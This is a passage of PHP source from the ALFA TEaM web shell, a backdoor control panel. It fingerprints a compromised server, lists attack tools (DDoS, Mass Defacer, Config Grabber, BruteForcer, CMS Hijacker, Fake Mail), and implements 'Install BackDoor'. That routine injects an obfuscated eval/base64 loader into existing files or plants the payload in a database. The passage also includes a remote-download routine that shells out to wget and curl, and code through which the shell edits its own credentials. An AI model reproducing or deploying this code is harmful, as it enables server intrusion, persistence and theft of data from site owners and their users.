2104<td><b>'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER['SERVER_NAME']):'????'):@$_SERVER["SERVER_ADDR"]).'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> '.@$_SERVER["REMOTE_ADDR"].'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>
2105</tr>
2106<tr>
2107<td width="3%"><span class="header_vars">DateTime:</span></td>
2108<td colspan="2"><b>'.date('Y-m-d H:i:s').'</b></td>
2109</tr>
2110<tr>
2111<td><span class="header_vars">Domains:</span></td>
2112<td width="76%"><span class="header_values" id="header_domains">';
2113if($GLOBALS['sys']=='unix'){
2114$d0mains = _alfa_file("/etc/named.conf",false);
2115if(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{
2116$count=0;
2117foreach($d0mains as $d0main){
2118if(@strstr($d0main,"zone")){
2119preg_match_all('#zone "(.*)"#', $d0main, $domains);
2120flush();
2121if(strlen(trim($domains[1][0])) > 2){
2122flush();
2123$count++;}}}
2124echo "$count Domains";}}
2125else{echo("Cant Read [ /etc/named.conf ]");}
2126echo '</span></td>
2127</tr>
2128<tr>
2129<td height="16"><span class="header_vars">HDD:</span></td>
2130<td><span class="header_vars">Total:</span><b>'.alfaSize($totalSpace).' </b><span class="header_vars">Free:</span><b>' . alfaSize($freeSpace) . ' ['. (int) ($freeSpace/$totalSpace*100) . '%]</b></td>
2131</tr>';
2132if($GLOBALS['sys']=='unix'){
2133$useful_downloader = '<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>';
2134if(!@ini_get('safe_mode')){
2135if(strlen(alfaEx("id",false,false))>0){
2136echo '<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>';
2137$userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl');
2138$x=0;
2139foreach($userful as $item)if(alfaWhich($item)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item.'</span>';}
2140if($x==0){echo "<span class='header_values' id='header_useful'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
2141echo '</td>
2142</tr>
2143<tr>
2144<td height="0" colspan="2"><span class="header_vars">Downloader: </span>';
2145$downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
2146$x=0;
2147foreach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo '<span class="header_values" style="margin-left: 4px;">'.$item2.'</span>';}
2148if($x==0){echo "<span class='header_values' id='header_downloader'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}
2149echo '</td>
2150</tr>';
2151}else{
2152echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
2153}
2154}else{
2155echo $useful_downloader;$GLOBALS["need_to_update_header"] = "true";
2156}
2157}else{
2158echo '<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>';
2159echo alfaEx('ver',false,false);
2160echo '</td>
2161</tr> <tr>
2162<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>
2163</tr></b>';
2164}
2165$quotes = (function_exists('get_magic_quotes_gpc')?get_magic_quotes_gpc():'0');if ($quotes == "1" or $quotes == "on"){$magic = '<b><span class="header_on">ON</span>';}else{$magic = '<span class="header_off">OFF</span>';}
2166echo '<tr>
2167<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>'.Alfa_GetDisable_Function().'</b></td>
2168</tr>
2169<tr>
2170<td height="16" colspan="2"><span class="header_vars">CURL :</span>'.$curl.' | <span class="header_vars">SSH2 : </span>'.$ssh2.' | <span class="header_vars">Magic Quotes : </span>'.$magic.' | <span class="header_vars"> MySQL :</span>'.$mysql.' | <span class="header_vars">MSSQL :</span>'.$mssql.' | <span class="header_vars"> PostgreSQL :</span>'.$pg.' | <span class="header_vars"> Oracle :</span>'.$or.' '.($GLOBALS['sys']=="unix"?'| <span class="header_vars"> CGI :</span> '.$cgi_shell:"").'</td><td width="15%"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></td>
2171</tr>
2172<tr>
2173<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>'.$open_b.'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>'.$safe_exe.'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>'.$safe_include.'</b></td>
2174</tr>
2175<tr>
2176<td height="11"><span class="header_vars">SoftWare: </span></td>
2177<td colspan="2"><b>'.@getenv('SERVER_SOFTWARE').'</b></td>
2178</tr>';
2179if($GLOBALS['sys']=="win"){
2180echo '<tr>
2181<td height="12"><span class="header_vars">DRIVE:</span></td>
2182<td colspan="2"><b>'.$drives.'</b></td>
2183</tr>';
2184}
2185echo '<tr>
2186<td height="12"><span class="header_vars">PWD:</span></td>
2187<td colspan="2"><span id="header_cwd">'.$cwd_links.' </span><a href="#" onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')"><span class="home_shell">[ Home Shell ]</span> </a></td>
2188</tr>
2189</table>
2190</div>
2191<div id="meunlist">
2192<ul>
2193';
2194$li = array('FilesMan'=>'Home','proc'=>'Process','phpeval'=>'Eval','sql'=>'SQL Manager','dumper'=>'Database Dumper','coldumper'=>'Column Dumper','hash'=>'En-Decoder','connect'=>'BC',
2195'zoneh'=>'ZONE-H','dos'=>'DDOS','safe'=>'ByPasser','cgishell'=>'Cgi Shell','ssiShell'=>'SSI SHELL','cpcrack'=>'Hash Tools',
2196'portscanner'=>'Port Scaner','basedir'=>'Open BaseDir','mail'=>'Fake Mail','ziper'=>'Compressor','deziper'=>'DeCompressor','IndexChanger'=>'Index Changer','pwchanger'=>'Add New Admin','ShellInjectors'=>'Shell Injectors',
2197'php2xml'=>'PHP2XML','cloudflare'=>'CloudFlare','Whmcs'=>'Whmcs DeCoder','symlink'=>'Symlink','MassDefacer'=>'Mass Defacer','Crackers'=>'BruteForcer','searcher'=>'Searcher','config_grabber'=>'Config Grabber','fakepage'=>'Fake Page','archive_manager'=>'Archive Manager',
2198'cmshijacker'=>'CMS Hijacker','remotedl'=>'Remote Upload','inbackdoor'=>'Install BackDoor','whois'=>'Whois','settings'=>'Alfa Settings','plus'=>'<span class="alfa_plus">Alfa +</font>','selfrm'=>'Remove Shell'
2199);
2200foreach($li as $key=>$value){
2201echo('<li><a id="menu_opt_'.$key.'" href="#action=options&path='.$GLOBALS['cwd'].'&opt='.$key.'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\'#action=options&path=\'+c_+\'&opt='.$key.'\';g(\''.$key.'\',null,\'\',\'\',\'\');d.querySelector(\'.opt-title\').innerHTML=this.innerHTML;">'.$value.'</a></li>'."\n");
2202}
2203if(!empty($_COOKIE['AlfaUser']) && !empty($_COOKIE['AlfaPass']))
2204echo '<li><a href="javascript:void(0);" onclick="g(\'logout\',null,\'\',\'\',\'\');setTimeout(function(){location.reload();},2000);"><font color="red">LogOut</font></a></li></ul></div>';
2205else
2206echo '</ul></div>';}else{
2207@error_reporting(E_ALL ^ E_NOTICE);
2208@ini_set('error_log',NULL);
2209@ini_set('log_errors',0);
2210@ini_set('max_execution_time',0);
2211@ini_set('magic_quotes_runtime', 0);
2212@set_time_limit(0);
2213}}
2214function alfalogout(){
2215@setcookie("AlfaUser", null, 2012);
2216@setcookie("AlfaPass", null, 2012);
2217unset($_COOKIE['AlfaUser'],$_COOKIE['AlfaPass']);
2218echo("<center><font color='red'>Logout...</font></center>");
2219}
2220function showAnimation($name){
2221 return '-webkit-animation: '.$name.' 800ms ease-in-out forwards;-moz-animation: '.$name.' 800ms ease-in-out forwards;-ms-animation: '.$name.' 800ms ease-in-out forwards;animation: '.$name.' 800ms ease-in-out forwards;';
2222}
2223function __showicon($r){
2224 $s['btn']='http://solevisible.com/images/btn.png';
2225 $s['alfamini']='http://solevisible.com/images/alfamini.png';
2226 $s['loader']='http://solevisible.com/images/loader.svg';
2227 //return 'data:image/png;base64,'.__get_resource($s[$r]);
2228 return $s[$r];
2229}
2230function alfainbackdoor(){
2231alfahead();
2232echo '<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'file\')">| In File | </a><a href=javascript:void(0) onclick="g(\'inbackdoor\',null,\'db\')">| In DataBase | </a></h3></center>';
2233$error = '<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>';
2234$success= '<font color="green">Success...!';
2235$textarea = "<div style='display:none;' id='backdoor_textarea'><div class='txtfont'>Your Shell:</div><p><textarea name='shell' rows='19' cols='103'><?php\n\techo('Alfa Team is Here...!');\n?></textarea></p></div>";
2236$select = "<div class='txtfont'>Use:</div> <select name='method' style='width:155px;' onChange='inBackdoor(this);'><option value='alfa'>Alfa Team Uploader</option><option value='my'>My Private Shell</option></select>";
2237$cwd = 'Example: /home/alfa/public_html/index.php';
2238if($_POST['alfa1']=='file'){
2239echo("<center><p><div class='txtfont_header'>| In File |</div></p><p><form onsubmit=\"g('inbackdoor',null,'file',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\">{$select} <div class='txtfont'>Backdoor Loader:</div> <input type='text' name='file' size='50' placeholder='{$cwd}'> <div class='txtfont'>Key: </div> <input type='text' name='key' size='10' value='alfa'> <input type='submit' value=' '>{$textarea}</form></p></center>");
2240if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa4']!=''){
2241$method = $_POST['alfa2'];
2242$file = $_POST['alfa3'];
2243$shell = $_POST['alfa4'];
2244$key = str_replace(array('"','\''),'',trim($_POST['alfa5']));
2245if($key=='')$key='alfa';
2246if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2247$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x("'.$shell.'");exit;}?>';
2248if(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}
2249if($_POST['alfa1']=='db'){
2250echo("<center><p><div class='txtfont_header'>| In DataBase |</div></p>".getConfigHtml('all')."<p><form onsubmit=\"g('inbackdoor',null,'db',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\">");
2251$table = array('td1' =>
2252array('color' => 'FFFFFF', 'tdName' => 'db_host : ', 'inputName' => 'db_host', 'id' => 'db_host', 'inputValue' => 'localhost', 'inputSize' => '50'),
2253'td2' =>
2254array('color' => 'FFFFFF', 'tdName' => 'db_username : ', 'inputName' => 'db_username', 'id' => 'db_user', 'inputValue' => '', 'inputSize' => '50'),
2255'td3' =>
2256array('color' => 'FFFFFF', 'tdName' => 'db_password : ', 'inputName' => 'db_password', 'id' => 'db_pw', 'inputValue' => '', 'inputSize' => '50'),
2257'td4' =>
2258array('color' => 'FFFFFF', 'tdName' => 'db_name : ', 'inputName' => 'db_name', 'id' => 'db_name', 'inputValue' => '', 'inputSize' => '50'),
2259'td5' =>
2260array('color' => 'FFFFFF', 'tdName' => 'Backdoor Loader: ', 'inputName' => 'file', 'inputValue' => $cwd, 'inputSize' => '50', 'placeholder' => true),
2261'td6' =>
2262array('color' => 'FFFFFF', 'tdName' => 'Key: ', 'inputName' => 'key', 'inputValue' => 'alfa', 'inputSize' => '50')
2263);
2264create_table($table);
2265echo("<p>{$select}</p>");
2266echo($textarea);
2267echo("<p><input type='submit' value=' '></p></form></p></center>");
2268if($_POST['alfa2']!=''&&$_POST['alfa3']!=''&&$_POST['alfa5']!=''&&$_POST['alfa6']!=''){
2269$dbhost = $_POST['alfa2'];
2270$dbuser = $_POST['alfa3'];
2271$dbpw = $_POST['alfa4'];
2272$dbname = $_POST['alfa5'];
2273$file = $_POST['alfa6'];
2274$method = $_POST['alfa7'];
2275$shell = $_POST['alfa8'];
2276$key = str_replace(array('"','\''),'',trim($_POST['alfa9']));
2277if($key=='')$key='alfa';
2278if($method=='my'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS['__ALFA_SHELL_CODE'];}
2279if($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){
2280$code = '<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="'.$key.'"){$conn=mysqli_connect("'.str_replace('"','\"',$dbhost).'","'.str_replace('"','\"',$dbuser).'","'.str_replace('"','\"',$dbpw).'","'.str_replace('"','\"',$dbname).'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\$c","e"."v"."al"."(\'?>\'.base"."64"."_dec"."ode(\$c));");$x($r["code"]);exit;}?>';
2281if(@is_file($file)&&@is_writable($file)){
2282@mysqli_query($conn,'DROP TABLE `alfa_bc`');
2283@mysqli_query($conn,'CREATE TABLE `alfa_bc` (code LONGTEXT)');
2284@mysqli_query($conn,'INSERT INTO `alfa_bc` VALUES("'.$shell.'")');
2285@file_put_contents($file,$code."\n".@file_get_contents($file));
2286__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.'</font>');}else{__alert($error);}}}}
2287echo('</div>');
2288alfafooter();
2289}
2290function alfawhois(){
2291echo("<div class='header'><center><p><div class='txtfont_header'>| Whois |</div></p><p><form onsubmit=\"g('whois',null,this.url.value,'>>');return false;\"><div class='txtfont'>Url: </div> <input type='text' name='url' style='text-align:center;' size='50' placeholder='google.com'> <input type='submit' value=' '></form></p></center>");
2292if($_POST['alfa2']=='>>'&&!empty($_POST['alfa1'])){
2293$site = str_replace(array('http://','https://','www.','ftp://'),'',$_POST['alfa1']);
2294$target = 'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain='.$site;
2295$data = @file_get_contents($target);
2296if($data==''){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}
2297$target = @json_decode($data,true);
2298echo __pre();
2299if(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}
2300echo("</div>");
2301}
2302function alfaremotedl(){
2303alfahead();
2304echo("<div class='header'><center><p><div class='txtfont_header'>| Upload From Url |</div></p><p>
2305<form onsubmit=\"g('remotedl',null,this.d.value,this.p.value,'>>');return false;\">
2306<p><div class='txtfont'>Url: </div> <input type='text' name='d' size='50'></p>
2307<div class='txtfont'>Path:</div> <input type='text' name='p' size='50' value='".$GLOBALS['cwd']."'><p><input type='submit' value=' '></p>
2308</form></p></center>");
2309if(isset($_POST['alfa1'],$_POST['alfa2'],$_POST['alfa3'])&&!empty($_POST['alfa1'])&&$_POST['alfa3']=='>>'){
2310echo __pre();
2311$url = $_POST['alfa1'];
2312$path = $_POST['alfa2'];
2313echo('<center>');
2314if(__download($url,$path)){
2315echo('<font color="green">Success...!</font>');
2316}else{
2317echo('<font color="red">Error...!</font>');
2318}
2319echo('</center>');
2320}
2321echo("</div>");
2322alfafooter();
2323}
2324function __download($url,$path=false){
2325if(!preg_match("/[a-z]+:\/\/.+/",$url)) return false;
2326$saveas = basename(rawurldecode($url));
2327if($path){$saveas=$path.$saveas;}
2328if($content = __read_file($url)){
2329if(@is_file($saveas))@unlink($saveas);
2330if(__write_file($saveas, $content)){return true;}}
2331$buff = alfaEx("wget ".$url." -O ".$saveas);
2332if(@is_file($saveas)) return true;
2333$buff = alfaEx("curl ".$url." -o ".$saveas);
2334if(@is_file($saveas)) return true;
2335$buff = alfaEx("lwp-download ".$url." ".$saveas);
2336if(@is_file($saveas)) return true;
2337$buff = alfaEx("lynx -source ".$url." > ".$saveas);
2338if(@is_file($saveas)) return true;
2339$buff = alfaEx("GET ".$url." > ".$saveas);
2340if(@is_file($saveas)) return true;
2341$buff = alfaEx("links -source ".$url." > ".$saveas);
2342if(@is_file($saveas)) return true;
2343$buff = alfaEx("fetch -o ".$saveas." -p ".$url);
2344if(@is_file($saveas)) return true;
2345return false;
2346}
2347function clean_string($string){
2348 if(function_exists("iconv")){
2349 $s = trim($string);
2350 $s = iconv("UTF-8", "UTF-8//IGNORE", $s);
2351 }
2352 return $s;
2353}
2354function __read_file($file, $boom = true){
2355$content = false;
2356if($fh = @fopen($file, "rb")){
2357$content = "";
2358while(!feof($fh)){
2359$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);
2360}
2361@fclose($fh);
2362}
2363if(empty($content)||!$content){
2364 $content = alfaEx("cat '".addslashes($file)."'");
2365}
2366return $content;
2367}
2368function alfaSettings(){
2369alfahead();
2370AlfaNum(6,7,8,9,10);
2371echo '<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'main\')">| Generall Setting | </a><a href=javascript:void(0) onclick="g(\'settings\',null,null,null,null,null,null,null,null,\'color\')">| Change Color | </a></h3></center>';
2372if($_POST["alfa8"] == "main"){
2373echo '<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\'post\'>';
2374$lg_array = array('0'=>'No','1'=>'Yes');
2375$penc_array = array('false'=>'No','true'=>'Yes');
2376$protect_html = "";
2377$icon_html = "";
2378$postEnc_html = "";
2379$login_html = "";
2380$cgiapi_html = "";
2381foreach($lg_array as $key=>$val)$protect_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['safemode']=='1'?'selected':'').'>'.$val.'</option>';
2382foreach($lg_array as $key=>$val)$icon_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['show_icons']=='1'?'selected':'').'>'.$val.'</option>';
2383foreach($penc_array as $key=>$val)$cgiapi_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa9'])&&$_POST['alfa9']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST['alfa9'])?'selected':'')).'>'.$val.'</option>';
2384foreach($penc_array as $key=>$val)$postEnc_html .= '<option value="'.$key.'" '.(!empty($_POST['alfa7'])&&$_POST['alfa7']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST['alfa7'])?'selected':'')).'>'.$val.'</option>';
2385$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");
2386foreach($lg_array as $key=>$val)$login_html .= '<option value="'.$key.'" '.($GLOBALS['DB_NAME']['login_page']==$key?'selected':'').'>'.$val.'</option>';
2387echo '';
2388echo '<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">'.$protect_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">'.$cgiapi_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">'.$postEnc_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">'.$icon_html.'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">'.$login_html.'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="'.(empty($_POST['alfa3'])?$GLOBALS['DB_NAME']['user']:$_POST['alfa3']).'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="'.$GLOBALS['DB_NAME']['safemode'].'"><input type="hidden" name="s" value="'.$GLOBALS['DB_NAME']['show_icons'].'"><p><input type="submit" name="btn" value=" "></p></form></center>';
2389if($_POST['alfa5']=='>>'){
2390echo __pre();
2391if(!empty($_POST['alfa3'])){
2392$protect = $_POST['alfa1'];
2393$lgpage = $_POST['alfa2'];
2394$username = $_POST['alfa3'];
2395$password = md5($_POST['alfa4']);
2396$icon = $_POST['alfa6'];
2397$post_encrypt = $_POST['alfa7'];
2398$cgi_api_val = $_POST['alfa9'];
2399@chdir($GLOBALS['home_cwd']);
2400$basename = @basename($_SERVER['PHP_SELF']);
2401$data = @file_get_contents($basename);
2402$user_rand = $GLOBALS["DB_NAME"]["user_rand"];
2403$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];
2404$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];
2405$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];
2406$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];
2407$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];
2408$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];
2409$find_user = '/\''.$user_rand.'\'(.*?),/i';
2410$find_pw = '/\''.$pass_rand.'\'(.*?),/i';
2411$find_lg = '/\''.$login_page_rand.'\'(.*?),/i';
2412$find_p = '/\''.$safemode_rand.'\'(.*?),/i';
2413$icons = '/\''.$show_icons_rand.'\'(.*?),/i';
2414$postEnc = '/\''.$post_encryption_rand.'\'(.*?),/i';
2415$cgi_api_reg = '/\''.$cgi_api_rand.'\'(.*?),/i';
2416if(!empty($username)&&preg_match($find_user,$data,$e)){
2417$new = '\''.$user_rand.'\' => \''.$username.'\',';
2418$data = str_replace($e[0],$new,$data);
2419}
2420if(!empty($_POST['alfa4'])&&preg_match($find_pw,$data,$e)){
2421$new = '\''.$pass_rand.'\' => \''.$password.'\',';
2422$data = str_replace($e[0],$new,$data);
2423}
2424if(!empty($lgpage)&&preg_match($find_lg,$data,$e)){
2425$new = '\''.$login_page_rand.'\' => \''.$lgpage.'\',';
2426$data = str_replace($e[0],$new,$data);
2427}
2428if(!empty($find_p)&&preg_match($find_p,$data,$e)){
2429$new = '\''.$safemode_rand.'\' => \''.$protect.'\',';
2430$data = str_replace($e[0],$new,$data);
2431}
2432if(preg_match($icons,$data,$e)){
2433$new = '\''.$show_icons_rand.'\' => \''.$icon.'\',';
2434$data = str_replace($e[0],$new,$data);
2435}
2436if(preg_match($postEnc,$data,$e)){
2437$new = '\''.$post_encryption_rand.'\' => '.$post_encrypt.',';
2438$data = str_replace($e[0],$new,$data);
2439}
2440if(preg_match($cgi_api_reg,$data,$e)){
2441$new = '\''.$cgi_api_rand.'\' => '.$cgi_api_val.',';
2442$data = str_replace($e[0],$new,$data);
2443}
2444if(@file_put_contents($basename,$data)){
2445echo '<b>UserName: </b><font color="green"><b>'.$username.'</b></font><br /><b>Password: </b><font color="green"><b>'.$_POST['alfa4'].'</b></font><script>post_encryption_mode = '.$post_encrypt.';</script>';
2446}else{
2447__alert("<span style='color:red;'>File has no edit access...!</span>");
2448}
2449}else{
2450__alert("<span style='color:red;'>UserName is Empty !</span>");
2451}
2452}
2453}elseif($_POST["alfa8"] == "color"){
2454echo('<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method=\'post\'>');
2455echo '<table border="1"><tbody>';
2456$template = '<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>';
2457$x = 1;
2458foreach($GLOBALS['__ALFA_COLOR__'] as $key => $value){
2459 $multi = "";
2460 if(is_array($value)){
2461 if(isset($value["multi_selector"])){
2462 $multi = __ZW5jb2Rlcg(json_encode($value));
2463 }
2464 }
2465 $value = alfa_getColor($key);
2466 $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key));
2467 echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template);
2468}
2469echo '<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>';
2470
2471echo '</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$(\'importFileBtn\').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g(\'settings\',null,null,null,null,null,null,null,\'export\',\'color\')" class="button"> Export </button></center></p>';
2472if($_POST['alfa7']=='export'){
2473 echo __pre();
2474 $colors = is_array($GLOBALS["DB_NAME"]["color"])?$GLOBALS["DB_NAME"]["color"]:array();
2475 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2476 $array = array();
2477 foreach($glob_colors as $k => $v){
2478 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2479 $v = trim($colors[$k]);
2480 }else{
2481 $v = trim(is_array($v)?$v["key_color"]:$v);
2482 }
2483 $array[$k] = $v;
2484 }
2485 $file = "alfa_color_config_".date('Y-m-d-h_i_s').".conf";
2486 $config = json_encode($array, JSON_PRETTY_PRINT);
2487 if(!@file_put_contents($file, $config)){
2488 echo('<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">'.$config.'</textarea></center></p>');
2489 }else{
2490 echo('<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g(\'FilesTools\',null,\''.$file.'\', \'download\')"><font color="#0F0">Download Config</font></a></center></p></h3>');
2491 }
2492}
2493if($_POST['alfa2']=='>>'){
2494 echo __pre();
2495 $colors = json_decode($_POST["alfa1"],true);
2496 $array = "";
2497 $is_default = isset($_POST["alfa3"])&&$_POST["alfa3"]=="1"?true:false;
2498 $glob_colors = $GLOBALS["__ALFA_COLOR__"];
2499 foreach($glob_colors as $k => $v){
2500 if(isset($colors[$k])&&!empty($colors[$k])&&!$is_default){
2501 $v = trim($colors[$k]);
2502 }else{
2503 $v = trim(is_array($v)?$v["key_color"]:$v);
2504 }
2505 $array .= '"'.trim($k).'" => "'.$v.'",';
2506 }
2507 @chdir($GLOBALS['home_cwd']);
2508 $basename = @basename($_SERVER['PHP_SELF']);
2509 $data = @file_get_contents($basename);
2510 $color = '/\'color\'(.*?)\),/s';
2511 if(preg_match($color,$data,$e)){
2512 $new = "'color' => array(".$array."),";
2513 $data = str_replace($e[0],$new,$data);
2514 if(@file_put_contents($basename, $data)){
2515 echo("<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>");
2516 }else{
2517 echo("<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>");
2518 }
2519 }else{
2520 echo("<center><p><h3>[-] Error...!</h3></p></center>");
2521 }
2522}
2523}
2524echo('</div>');
2525alfafooter();
2526}
2527function alfaplus(){
2528alfahead();
2529echo '<div class="header"><center><p><div class="txtfont_header">| Alfa + |</div></p><center><h3><a href=javascript:void(0) onclick="g(\'plus\',null,\'news\');">| News | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'tools\')">| Tools | </a><a href=javascript:void(0) onclick="g(\'plus\',null,\'about\')">| About Us | </a></h3></center>';
2530if($_POST['alfa1']=='news'||$_POST['alfa1']=='tools'){
2531try{
2532$s1 = 'http://solevisible.com/'.($_POST['alfa1']=='news'?'news.php':'tools.php');
2533$msg = "<center><font color='red'><b><p>Can`t Connect to Remote Server ...!<br>Please Try Again Later...!</p></b></font></center>";
2534$news = new AlfaCURL();
2535if($news->Send($s1)){
2536$xml = $news->Send($s1);
2537}else{
2538$xml = false;
2539}
2540if($xml){
2541if(@simplexml_load_string($xml)){
2542$doc = new DOMDocument;
2543$doc->loadXML($xml);
2544$data = @$doc->getElementsByTagName('data')->item(0);
2545$items = @$data->getElementsByTagName('item');
2546foreach($items as $item){
2547$title = @$item->getElementsByTagName('title')->item(0)->nodeValue;
2548$description = @$item->getElementsByTagName('description')->item(0)->nodeValue;
2549$link = @$item->getElementsByTagName('link')->item(0)->nodeValue;
2550$pubDate = @$item->getElementsByTagName('pubDate')->item(0)->nodeValue;
2551echo(__pre()."<center><a href='$link' target='_blank'>$title</a><br>$description<br><small><font color='#FFFFFF'><b>Date: $pubDate</b></font></small></center></pre>");
2552}
2553}else{
2554echo($msg);
2555}
2556}else{
2557echo($msg);
2558}
2559}catch(Exception $e){
2560echo $e->getMessage();
2561}}elseif($_POST['alfa1']=='about'){
2562echo __pre()."<pre><center><img src='http://solevisible.com/images/farvahar-iran.png'><br>
2563<b><font size='+3' color='#00A220'>☮ ~ PEACE ~ ☮</font><br><b>
2564<font color='#00A220'>Shell Coded By Sole Sad & Invisible (ALFA TEaM)</font><br>
2565<font color='#00A220'>Contact : solevisible@gmail.com</font><br>
2566<font color='#00A220'>Telegram Channel: @solevisible</font><br>
2567<font color='#FFFFFF'>Skype : ehsan.invisible</font><br>
2568<font color='#FFFFFF'>Skype : sole.sad</font><br>
2569<font color='#FF0000'>Persian Gulf For Ever</font><br>
2570<font color='#FF0000'>Iranian Programmers</font><br>
2571<font color='#FF0000'>############</font><br>
2572</center></pre><iframe src='tg://resolve?domain=solevisible' frameborder='0' width='0' height='0'></iframe>";
2573}
2574echo('</div>');
2575alfafooter();
